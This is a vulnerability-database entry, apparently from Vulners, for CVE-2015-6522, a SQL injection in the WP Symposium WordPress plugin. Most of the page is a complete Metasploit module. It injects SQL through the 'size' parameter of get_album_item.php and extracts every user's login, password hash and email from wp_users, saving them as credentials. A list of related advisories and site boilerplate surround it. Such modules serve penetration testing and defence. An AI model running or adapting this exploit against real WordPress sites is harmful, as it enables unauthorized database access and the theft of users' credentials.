Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Symposium Plugin SQL Injection

🗓️ 17 Nov 2016 14:04:53Reported by PizzaHatHacker, Matteo Cantoni <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 55 Views

Exploiting SQL injection in WordPress Symposium Plugi

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2015-6522
29 May 201815:50
circl
CNVD		WordPress WP Symposium Plugin SQL Injection Vulnerability
20 Aug 201500:00
cnvd
Check Point Advisories		WordPress Symposium Plugin SQL Injection (CVE-2015-6522)
8 Dec 201600:00
checkpoint_advisories
CVE		CVE-2015-6522
19 Aug 201515:00
cve
Cvelist		CVE-2015-6522
19 Aug 201515:00
cvelist
NVD		CVE-2015-6522
19 Aug 201515:59
nvd
OpenVAS		WordPress WP Symposium Multiple SQL Injection Vulnerabilities
24 Aug 201500:00
openvas
Packet Storm		WordPress Symposium Plugin SQL Injection
31 Aug 202400:00
packetstorm
Patchstack		WordPress Symposium Plugin 15.1 - SQL Injection #2
18 Aug 201500:00
patchstack
Patchstack		WordPress Symposium Plugin <= 15.7- SQL Injection
19 Aug 201500:00
patchstack
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Symposium Plugin SQL Injection',
        'Description' => %q{
          This module exploits a SQL injection vulnerability in the WP Symposium plugin
          before 15.8 for WordPress, which allows remote attackers to extract credentials
          via the size parameter to get_album_item.php.
        },
        'Author' => [
          'PizzaHatHacker', # Vulnerability discovery
          'Matteo Cantoni <goony[at]nothink.org>' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2015-6522'],
          ['EDB', '37824']
        ],
        'DisclosureDate' => '2015-08-18'
      )
    )

    register_options(
      [
        OptString.new('URI_PLUGIN', [true, 'The WordPress Symposium Plugin URI', 'wp-symposium'])
      ]
    )
  end

  def check
    check_plugin_version_from_readme('wp-symposium', '15.8.0', '15.5.1')
  end

  def uri_plugin
    normalize_uri(wordpress_url_plugins, datastore['URI_PLUGIN'], 'get_album_item.php')
  end

  def send_sql_request(sql_query)
    uri_complete = normalize_uri(uri_plugin)

    begin
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => uri_complete,
        'vars_get' => { 'size' => sql_query }
      )

      return nil if res.nil? || res.code != 200 || res.body.nil?

      res.body
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
      vprint_error("#{peer} - The host was unreachable!")
      return nil
    end
  end

  def run
    vprint_status("#{peer} - Attempting to connect...")
    vprint_status("#{peer} - Trying to retrieve the first user id...")
    first_id = send_sql_request('id from wp_users order by id asc limit 1 ; --')
    if first_id.nil?
      vprint_error("#{peer} - Failed to retrieve the first user id... Try with check function!")
      return
    else
      vprint_status("#{peer} - First user-id is '#{first_id}'")
    end

    vprint_status("#{peer} - Trying to retrieve the last user id...")
    last_id = send_sql_request('id from wp_users order by id desc limit 1 ; --')
    if last_id.nil?
      vprint_error("#{peer} - Failed to retrieve the last user id")
      return
    else
      vprint_status("#{peer} - Last user-id is '#{last_id}'")
    end

    credentials = ''

    vprint_status("#{peer} - Trying to retrieve the users information...")
    for user_id in first_id..last_id
      separator = Rex::Text.rand_text_numeric(7, bad = '0')
      user_info = send_sql_request("concat_ws(#{separator},user_login,user_pass,user_email) from wp_users where id = #{user_id} ; --")

      if user_info.nil?
        vprint_error("#{peer} - Failed to retrieve the users info")
        return
      else
        values = user_info.split(separator.to_s)

        user_login = values[0]
        user_pass = values[1]
        user_email = values[2]

        print_good("#{peer} - #{sprintf('%-15s %-34s %s', user_login, user_pass, user_email)}")
        connection_details = {
          module_fullname: fullname,
          username: user_login,
          private_data: user_pass,
          private_type: :nonreplayable_hash,
          status: Metasploit::Model::Login::Status::UNTRIED,
          proof: user_email
        }.merge(service_details)
        create_credential(connection_details)

        credentials << "#{user_login},#{user_pass},#{user_email}\n"
      end
    end

    unless credentials.empty?
      loot = store_loot('wp_symposium.http', 'text/plain', rhost, credentials)
      vprint_good("Credentials saved in: #{loot}")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jan 2024 20:02Current
8.4High risk
Vulners AI Score8.4
CVSS 27.5
EPSS0.79815
sql injectionwordpresswp symposium
55